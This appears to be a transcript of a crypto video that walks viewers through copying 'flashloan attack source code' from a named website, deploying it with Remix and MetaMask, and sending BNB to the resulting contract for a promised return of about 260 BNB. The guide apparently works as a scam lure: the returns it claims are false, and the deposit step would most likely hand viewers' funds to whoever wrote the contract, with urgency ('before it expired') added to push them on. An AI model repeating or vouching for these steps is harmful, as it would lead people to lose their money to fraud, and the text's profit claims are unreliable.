What's up guys? Crypto University here. I'll show you how to get BNB by using flashloan attack. Alright, without further ado, let's start it. All you need to do is open flashloanmix.com. Scroll down and you will see there are three methods. Click the latest BNB to get flashloan attack source code. Open Remix Ethereum and click Solidity Compiler menu. Click Compiler, then select 0.5.0 version. Back to Flashloan Mix. On Navigation menu, click menu number 5 and copy flashloan attack source code. Then go back to Remix Ethereum. Click menu number 1 or Solidity file menu. Click new file with name flashloan.sol and paste flashloan attack source code. Go back to Solidity compiler menu. Then click compile flashloan.sol. After the compiler its success, go to deploy and run transaction menu or menu number 3. Click on environment, then change the value to injected web3. If you never try this method, there will be confirmation on MetaMask and accept that request. Check the contract name. Make it sure the value is flashloan.sol. Click deploy, input token name, token symbol, and loan amount. Next, click transact and click confirm on your MetaMask wallet. After transaction complete, copy your contract address that has been created and input liquidity amount on MetaMask wallet. If you input 10 loan amount and 26 liquidity amount, it means 10 times 26, which is you can get around 260 BNB. After the transaction success, click Flashloan to do flashloan attack and click confirm on your MetaMask wallet. Wait for a while until the contract finish and then check your MetaMask wallet. Try it quickly before it expired. Don't forget to like, share, and subscribe. You can check our video about Ethereum flashloan attack on link description below. Have fun and have a good day.